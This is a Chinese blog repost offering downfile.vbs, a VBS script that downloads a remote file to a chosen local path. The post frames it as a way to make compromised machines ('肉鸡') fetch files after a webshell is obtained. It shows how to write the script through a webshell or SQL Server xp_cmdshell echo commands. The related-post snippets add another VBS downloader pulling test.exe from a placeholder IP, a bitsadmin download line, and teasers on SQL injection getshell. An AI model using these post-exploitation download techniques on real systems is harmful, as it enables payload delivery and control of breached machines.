远程下载脚本downfile.vbs

最新推荐文章于 2023-12-28 11:30:00 发布
转载 最新推荐文章于 2023-12-28 11:30:00 发布 · 1.9k 阅读 · 2
标签
#脚本 #sqlserver #shell #xp
本文介绍了一种通过VBS脚本实现在WebShell环境下远程下载文件的方法。该脚本使用Microsoft.XMLHTTP对象发起GET请求获取远程文件内容,并通过ADODB.Stream对象将内容保存到本地指定路径。
拿到shell以后上传下载文件是个难题,下面的代码可以控制肉鸡自动下载文件。  

远程下载脚本downfile.vbs  
On Error Resume Next  
Dim iRemote,iLocal  
iLocal = LCase(WScript.Arguments(1))   
iRemote = LCase(WScript.Arguments(0))   
Set xPost = CreateObject("Microsoft.XMLHTTP")   
xPost.Open "GET",iRemote,0   
xPost.Send()   
Set sGet = CreateObject("ADODB.Stream")   
sGet.Mode = 3   
sGet.Type = 1   
sGet.Open()   
sGet.Write(xPost.responseBody)   
sGet.SaveToFile iLocal,2  

在webshell里面直接 echo ... >>c:/downfile.vbs就可以生成了,而sql server中可以用exec master.. xp_cmdshell ’echo ... >>c:/downfile.vbs ’。  

 

 
httpdownfile
06-09
简单的网络下载文件程序。 WSADATA wdata; WSAStartup(MAKEWORD(2,2),&wdata); int sockfd; char buffer[1024]; struct sockaddr_in server_addr; struct hostent *host; int portnumber,nbytes; char host_addr[256]; char host_file[1024]; char local_file[256]; FILE * fp; char request[1024]; int isend, totalsend; int i; char * pt; memset(host_file,0,sizeof(host_file)); memcpy(host_file,"down/HB_EHSniffer36_ljh.rar",strlen("down/HB_EHSniffer36_ljh.rar")+1); if((host=gethostbyname("nmas.onlinedown.net"))==NULL)/*取得主机IP地址*/ { fprintf(stderr,"Gethostname error, %s\n", strerror(errno)); exit(1); } /* 客户程式开始建立 sockfd描述符 */ if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)/*建立SOCKET连接*/ { fprintf(stderr,"Socket Error:%s\a\n",strerror(errno)); exit(1); } /* 客户程式填充服务端的资料 */ memset(&server_addr,0,sizeof(server_addr)); server_addr.sin_family=AF_INET; server_addr.sin_port=htons(80); server_addr.sin_addr=*((struct in_addr *)host->h_addr); /* 客户程式发起连接请求 */ if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==-1)/*连接网站*/ { fprintf(stderr,"Connect Error:%s\a\n",strerror(errno)); exit(1); } memset(request,0,1024); sprintf(request,"GET /%s HTTP/1.1\r\nAccept: */*\r\nCache-Control: no-cache\r\nConnection: close\r\nHost: %s\r\nPragma: no-cache\r\nReferer: http://www.onlinedown.net/soft/15450.htm\r\nRange: bytes=0-\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )\r\n\r\n" ,host_file,"nmas.onlinedown.net"); printf("%s", request);/*准备request,将要发送给主机*/
downFile.jar的源程序
08-16
downFile.jar的源程序
下载文件downFile
jyn15159的博客
07-08 2771
下载文件downFile 定义下载文件的方法downFile: import axios from 'axios' import qs from 'qs' /** * 下载文件 * @param url * @param fileName * @param params */ export function downFile (url, fileName, params, method) { const downLink = document.createElement('a') do
downfile文件下载
NEOU2的博客
04-12 1万+
/*  * 文件名:DownLoadAction.java  * 版权:Copyright 2016 Huawei Tech. Co. Ltd. All rights Reserved.  * 描述:  * 修改人:cWX340527  * 修改时间:2016年3月4日  * 修改内容:新增  */ package com.huawei.srcms.securityreport.w
前端实现文件下载的功能
weixin_30409849的博客
05-24 718
1.第一种方法:downFile(下载地址, 保存名称); function downFile(content, filename) { // 创建隐藏的可下载链接 var eleLink = document.createElement('a'); eleLink.download = filename; eleLink.style.display ...
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
利用xp_cmdshell 导出文件到本地和网络路径。
Landa_Peter的专栏
08-12 1138
1.导出到本地: [sql] view plaincopy --创建测试文件夹。  master..xp_cmdshell 'mkdir E:\Test\'   [sql] view plaincopy --导出文件到本地,包括本机的数据库的连接方式。   [sql] view plaincopy "font-fami
vbs下载者和powershell下载
yiyefangzhou24的专栏
12-25 2452
vbs Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://IP/test.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.T
MySQL&SQL server&Oracle&Access&PostgreSQL数据库sql注入详解 _
mingyqf的博客
03-25 2931
本文作者: Yokan 本文链接: https://www.cnblogs.com/yokan/p/15456374.html 判断数据库的类型 当我们通过一些测试,发现存在SQL注入之后,首先要做的就是判断数据库的类型。 常用的数据库有MySQL、Access、SQLServer、Oracle、PostgreSQL。虽然绝大多数数据库的大部分SQL语句都类似,但是每个数据库还是有自己特殊的表的。通过表我们可以分辨是哪些数据库。 MySQL数据库的特有的表是 information_schema.table
down_file.jsp 文件下载页面
司刚军的个人专栏
01-13 1904
<% String str = request.getParameter("path"); if(str == null || "".equals(str)){ return; } String path = request.getRealPath(str); File file = new File(path); if (!file.exists() || file.isDire
网页中是否能实现下载文件夹?
weixin_45525177的博客
09-04 1310
1.第一种方法:downFile(下载地址,保存名称); function downFile(content, filename) { //创建隐藏的可下载链接 var eleLink = document.createElement('a'); eleLink.download = filename; eleLink.style.display...
DownFile(c#)文件上传
02-14
DownFile c# 文件上传
phpcms v9 表单添加文件上传字段单个文件(downfile
luyaran的博客
11-27 3216
1.打开目录 ./phpcms/modules/content/fields/ ;把 文件夹downfile,拷贝到目录./phpcms/modules/formguide/fields/里面。 2.打开文件 ./phpcms/modules/formguide/fields/fields.inc.php ,在数组$fields添加值 'downfile'=>'文件上传'; 3.打开文件.
网络安全专有名词汇编详解(黑话指南)-史上最全
qq_44005305的博客
12-28 1477
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里2 网络安全专有名词详解(黑话指南)2.1 肉鸡“肉鸡”是一种很形象的比喻,比喻那些被黑客控制的电脑,对方可以是 Windows 系统, 也可以是 UNIX/LINUX 系统,可以是普通的个人电脑,也可以是大型的服务器,一旦你的电脑称为“肉鸡”,就意味着别人可以随心所欲地操作你的电脑,而不会被你发觉。2.2 木马那些表面上伪装成正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。有很多黑客热衷于使用木马程序来控制别人的电脑。
ASP保存远程图片
weixin_30652879的博客
12-22 189
<% FunctionSaveRemoteFile(sSavePath,sRemoteFileUrl)OnErrorResumeNextSaveRemoteFile=FalseDimoXML:SetoXML=Server.CreateObject("Microsoft.XMLHTTP")WithoXML.O...
远程服务下载文件 概述 及 小技巧
sxwehren的博客
05-14 605
背景:有两台服务器 本地Linux服务器A 和 FTP服务器B ,任务是:从 A 中使用用户名和密码远程登录 FTP 服务器 B ,并下载 B 中的内容到本地 A 服务器的对应目录下。 方案概述:                     1.编一个脚本.sh文件,编写规则类似于Windows的批处理文件.bat文件,google一下,啥都有);
内网渗透-vbs脚本上传文件-bitsadmin上传文件-提权
qq_40784515的博客
05-06 995
其实这个上传文件是通过vbs脚本加载远程服务器的文件有点像远程文件包含 1. bitsadmin bitsadmin /transfer myDownLoadJob /download /priority normal "https://127.0.0.1/123.txt" "d:\xmapp\1.txt" 将服务器的1.txt下载到本地并且可以自定义文件名。 2. cscript cscrip...
【批处理脚本——更新电脑日期格式,自动下载软件到指定文件夹下】
sanwurensheng的博客
11-27 1978
if exist %Save% (echo 位置:%Save%) else (mkdir %Save% & echo 已创建:%Save%)::设置程序的工作路径,一般为程序主目录,此项若留空,脚本将自行分析路径。::设置要下载的文件链接,仅支持http协议,必写项。::设置文件保存目录,若下载至当前目录,请留空。::设置程序或文件的完整路径(必选)::设置快捷方式显示的说明(可选)set Desc=古木造型管理系统。::下载完删除生成的vbs文件。::设置快捷方式名称(必选)
VBS下载并保存
lacoucou的专栏
07-14 1650
VBS下载并保存。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值